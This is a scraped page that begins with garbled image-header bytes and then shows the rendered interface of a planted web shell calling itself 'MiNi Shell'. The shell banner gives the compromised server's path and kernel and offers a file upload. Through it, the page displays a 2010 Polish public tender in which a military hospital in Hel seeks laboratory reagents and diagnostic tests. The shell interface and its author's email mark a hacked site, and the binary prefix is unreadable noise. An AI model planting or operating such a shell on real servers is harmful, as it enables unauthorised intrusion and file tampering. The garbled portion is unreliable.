JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100115/12870-N-2010.html

<p class="kh_header"><b>Hel: DOSTAWA ODCZYNNIKÓW, TESTÓW ORAZ WYROBÓW DO DIAGNOSTYKI LABORATORYJNEJ</b><br>
<b>Numer ogłoszenia: 12870 - 2010; data zamieszczenia: 15.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 115 Szpital Wojskowy z Przychodnią SP ZOZ , ul. Boczna 10, 84-150 Hel, woj. pomorskie, tel. 058 6757401, faks 058 6757402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.115szpital.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ODCZYNNIKÓW, TESTÓW ORAZ WYROBÓW DO DIAGNOSTYKI LABORATORYJNEJ.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem  zamówienia jest dostawa odczynników, testów i wyrobów laboratoryjnych do 115 Szpitala Wojskowego SP ZOZ w Helu w podziale na 8 pakietów:
PAKIET I - 	Testy lateksowe i szybkie testy diagnostyczne
PAKIET II - 	Staphylococcus test płytkowy
PAKIET III - 	Zestawy do oznaczeń metodą ELISA do aparatu STATFAX
PAKIET IV - 	Paski do badania moczu do analizatora H500 DIRUI
PAKIET V - 	Odczynniki do aparatu SYSMEX KX-21
PAKIET VI - 	Odczynniki do aparatu CHROM-7
PAKIET VII - 	Materiały jednorazowe do diagnostyki i badań laboratoryjnych
PAKIET VIII - 	Odczynniki biochemiczne dla dzierżawionego analizatora biochemicznego typ A-15
2.	Szczegółowy opis przedmiotu zamówienia asortyment i szacunkowe ilości oraz wymagane parametry i warunki graniczne opisano w załączniku nr 2 do SIWZ- formularz asortymentowo-cenowy.
3.	Określone w załączniku nr 2 do SIWZ ilości są wielkością szacunkową, nie są wiążące dla Zamawiającego. Szacunkowe ilości mogą ulec zmniejszeniu i mogą zostać zredukowane do faktycznych potrzeb szpitala, są one wartościami maksymalnymi zamówienia. 
4.	Oferowany przedmiot zamówienia musi posiadać następujące dokumenty:
zgłoszenie do rejestru wyrobów medycznych i deklaracje zgodności CE i/lub certyfikaty CE i świadectwa dopuszczenia do obrotu zgodne z ustawą z dnia 20.04.2004 r. o wyrobach medycznych - Dz. U. nr 93 poz. 896.
5.	Oferowane wyroby muszą spełniać wymagania zasadnicze zgodnie z Rozporządzeniem Ministra Zdrowia z dnia 03 listopada 2004 r  w sprawie wymagań zasadniczych dla wyrobów medycznych, ich wyposażenia oraz sposobu oceny zgodności wyrobów medycznych z tymi wymaganiami 
Dz. U.  Nr 251 poz. 2514
6.	Dopuszcza się składanie ofert równoważnych w tych pozycjach gdzie zamawiający posłużył się oznaczeniem producenta lub marką. W takim przypadku należy podać nazwę handlową oferowanego odpowiedniego preparatu.
Przedmiot zamówienia opisano w sposób nie utrudniający uczciwej konkurencji, zgodnie z postanowieniami art. 29 ust.2 ustawy. Mając na uwadze postanowienia art. 29 ust.3 ustawy należy przyjąć, iż określonemu przez zamawiającego w formularzach asortymentowo-cenowych przedmiotowi zamówienia towarzyszą wyrazy - lub równoważny, co oznacza odpowiedniki wyrobów wskazanych przez zamawiającego w formularzach asortymentowo-cenowych, a więc wyroby medyczne o takiej samej lub wyższej jakości zapewniające możliwość uzyskania efektu założonego przez zamawiającego i sprecyzowanego w poszczególnych formularzach asortymentowo-cenowych za pomocą innych rozwiązań technicznych, a więc służące celom określonym w poszczególnych formularzach, z zastrzeżeniem ograniczeń wskazanych przy poszczególnych produktach. Równoważność oferowanych produktów może być wykazana przez wykonawcę za pomocą dowodów przedstawionych w dowolnej formie. Wystarczające będzie tu wskazanie oferowanego produktu z uwzględnieniem jego dokładnej charakterystyki co do parametrów techniczno-użytkowych, co traktowane będzie jako oświadczenie wykonawcy w tej kwestii. 
7.	Termin ważności oferowanego przedmiotu zamówienia nie może być krótszy niż 12 miesięcy od daty dostarczenia. Krótszy termin ważności dopuszcza się w sytuacji gdy jest to uzasadnione specyfiką danego produktu, gdy ze względu na skład, komponenty czy system produkcji nie jest możliwe zapewnienie 12-to miesięcznego terminu ważności (dot. zwłaszcza produktów hematologicznych: krew, produkty krwiopochodne, krwinki wzorcowe, wyciągi z osocza, itp.). W pozostałych przypadkach konieczne jest zachowanie 12-to miesięcznego terminu ważności. 
8.	Zamawiający wymaga dołączenia do PAKIETU VIII metryk surowic kontrolnych biochemicznych i kalibratora biochemicznego. Zakresy analitów w surowicy kalibracyjnej biochemicznej i surowicy kontrolnej biochemicznej muszą spełniać warunek spójności pomiarowej i muszą być odniesione do dostępnych materiałów referencyjnych wyższego rzędu (art.19 pkt.1 Ustawy o wyrobach medycznych w związku z pkt 4 załącznika nr 1 części I Rozporządzenia Ministra Zdrowia z dnia 03 listopada 2004 r. z późn. Zmianami w sprawie wymagań zasadniczych dla wyrobów medycznych do diagnostyki in vitro). Zakresy enzymów muszą być spójne z najnowszymi dostępnymi materiałami referencyjnymi opracowanymi przez komisję IFCC ds Systemów Referencyjnych dla enzymów. Należy dostarczyć przykładową ulotkę z wartościami na potwierdzenie spełniania tych warunków wraz z ofertą.
Zamawiający wymaga odczynników niewymagających dodatkowej walidacji (zgodnych z instrukcją obsługi aparatu - art. 4 pkt 4 Ustawy o wyrobach medycznych). Dopuszcza się zaoferowane odczynników innych niż oryginalnych, pod warunkiem ich walidacji przez producenta aparatu( załączyć do oferty odpowiedni dokument potwierdzający )
Do oferty załączyć dokument potwierdzający walidację odczynników przez producenta aparatu.
9.	Odczynniki z PAKIETÓW III, IV, V, VI, VII muszą posiadać aplikacje na aparat:
PAKIET III na aparat STATFAX 303+
PAKIET IV na aparat H500 DIRUI
PAKIET V na aparat SYSMEX KX-21
PAKIET VI na aparat CHROM-7
PAKIET VIII na aparat A-15
do wyżej wymienionych aparatów załączyć aplikacje (sporządzone w języku polskim a jeżeli dokument sporządzony jest w innym języku należy dołączyć także tłumaczenie na język polski)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.19.25.00-7, 33.12.41.31-2, 33.14.15.10-8, 33.14.16.15-4, 38.43.70.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki określone w art. 22 ust. 1 ustawy, tj. dotyczące:
a.	posiadania uprawnień do wykonywania określonej działalności lub czynności jeżeli przepisy prawa nakładają obowiązek ich posiadania,
b.	posiadania wiedzy i doświadczenia, 
c.	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
d.	sytuacji ekonomicznej i finansowej.
2.	Ocena spełnienia warunków udziału w postępowaniu nastąpi na podstawie złożonego przez Wykonawcę oświadczenia- załącznik nr 3 do SIWZ. 
3.	Niespełnienie któregokolwiek z warunków skutkować będzie wykluczeniem Wykonawcy z  postępowania.
4.	Złożenie przez Wykonawcę nieprawdziwych informacji, mających wpływ na wynik prowadzonego postępowania, spowoduje wykluczenie Wykonawcy z postępowania.
5.	Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W CELU POTWIERDZENIA SPEŁNIENIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU, DO OFERTY NALEŻY ZAŁĄCZYĆ: 
a.	Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ustawy Pzp. Wzór oświadczenia stanowi załącznik Nr 3 do SIWZ. 
b.	Jeżeli Wykonawca polega na wiedzy i doświadczeniu, innych podmiotów zobowiązany jest przedstawić pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji wymaganych zasobów na okres korzystania z nich przy wykonywaniu zamówienia
2.	W CELU WYKAZANIA BRAKU PODSTAW DO WYKLUCZENIA, DO OFERTY NALEŻY ZAŁĄCZYĆ: 
a.	Oświadczenie o braku podstaw do wykluczenia z art. 24 ustawy Pzp. Wzór oświadczenia stanowi załącznik Nr 4 do SIWZ. 
b.	Aktualny odpis z właściwego rejestru lub aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia ewidencji działalności gospodarczej - wystawiony nie wcześniej, niż  6 miesięcy przed upływem terminu składania ofert.
3.	W CELU POTWIERDZENIA, ŻE OFEROWANY PRZEDMIOT ZAMÓWIENIA ODPOWIADA WSZYSTKIM WYMAGANIOM ZAMAWIAJĄCEGO OKREŚLONYM W SIWZ WYKONAWCA SKŁADA:
a.	Ulotki i inne dokumenty wymienione w punkcie III ppkt. 8 i 9.
b.	Oświadczenie wg. wzoru stanowiącego załącznik nr 5 do SIWZ.
4.	INNE DOKUMENTY SKŁADANE WRAZ Z OFERTĄ:
a.	wypełniony i podpisany formularz oferty (załącznik nr 1 do SIWZ) wraz z formularzem asortymentowo-cenowym (załącznik nr 2 do SIWZ).
b.	Oświadczenie o akceptacji warunków umowy (załącznik nr 6 do SIWZ).
c.	pełnomocnictwo do podpisania oferty, o ile nie wynika to z ustawy lub innych dokumentów załączonych do oferty.
5.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. VI, ppkt. 2 b składa dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające, że: 
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości.
6.	Zgodnie z art. 23 ust.1 Prawa zamówień publicznych wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia składając następujące dokumenty:
a.	Każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia składa oddzielne dokumenty wymienione w pkt 1 ppkt a, pkt 2 ppkt a i b, 
b.	Oświadczenie o ustanowieniu pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarciu umowy w sprawie zamówienia publicznego.
c.	W formularzu oferty oraz na załącznikach wpisywane będą dane wykonawcy zbiorowego i podpisywane będą przez upoważnionego pełnomocnika.
d.	Zgodnie z art. 141 Prawa zamówień publicznych Wykonawcy ponoszą solidarną odpowiedzialność za wykonanie umowy.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> http://bip.115szpital.eu.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 115 Szpitala Wojskowy z Przychodnią SP ZOZ, 84-150 Hel, ul. Boczna 10.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.01.2010 godzina 10:00, miejsce: Sekretariat 115 Szpitala Wojskowego z Przychodnią SP ZOZ, 84-150 Hel, ul. Boczna 10- budynek administracyjny, drugie piętro, pokój nr 206.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Testy lateksowe i szybkie testy diagnostyczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Testy lateksowe i szybkie testy diagnostyczne. Szczegółowy opis przedmiotu zamówienia asortyment i szacunkowe ilości oraz wymagane parametry i warunki graniczne opisano w załączniku nr 2 do SIWZ- formularz asortymentowo-cenowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Staphylococcus test płytkowy.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Staphylococcus test płytkowy. Szczegółowy opis przedmiotu zamówienia asortyment i szacunkowe ilości oraz wymagane parametry i warunki graniczne opisano w załączniku nr 2 do SIWZ- formularz asortymentowo-cenowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zestawy do oznaczeń metodą ELISA do aparatu STATFAX.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestawy do oznaczeń metodą ELISA do aparatu STATFAX. Szczegółowy opis przedmiotu zamówienia asortyment i szacunkowe ilości oraz wymagane parametry i warunki graniczne opisano w załączniku nr 2 do SIWZ- formularz asortymentowo-cenowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Paski do badania moczu do analizatora H500 DIRUI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Paski do badania moczu do analizatora H500 DIRUI. Szczegółowy opis przedmiotu zamówienia asortyment i szacunkowe ilości oraz wymagane parametry i warunki graniczne opisano w załączniku nr 2 do SIWZ- formularz asortymentowo-cenowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.12.41.31-2, 33.69.65.00-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Odczynniki do aparatu SYSMEX KX-21.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki do aparatu SYSMEX KX-21. Szczegółowy opis przedmiotu zamówienia asortyment i szacunkowe ilości oraz wymagane parametry i warunki graniczne opisano w załączniku nr 2 do SIWZ- formularz asortymentowo-cenowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 33.14.15.10-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Odczynniki do aparatu CHROM-7.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki do aparatu CHROM-7. Szczegółowy opis przedmiotu zamówienia asortyment i szacunkowe ilości oraz wymagane parametry i warunki graniczne opisano w załączniku nr 2 do SIWZ- formularz asortymentowo-cenowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Materiały jednorazowe do diagnostyki i badań laboratoryjnych.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materiały jednorazowe do diagnostyki i badań laboratoryjnych. Szczegółowy opis przedmiotu zamówienia asortyment i szacunkowe ilości oraz wymagane parametry i warunki graniczne opisano w załączniku nr 2 do SIWZ- formularz asortymentowo-cenowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.25.00-7, 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Odczynniki biochemiczne dla dzierżawionego analizatora biochemicznego typ A-15.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odczynniki biochemiczne dla dzierżawionego analizatora biochemicznego typ A-15. Szczegółowy opis przedmiotu zamówienia asortyment i szacunkowe ilości oraz wymagane parametry i warunki graniczne opisano w załączniku nr 2 do SIWZ- formularz asortymentowo-cenowy..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.69.65.00-0, 38.43.70.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com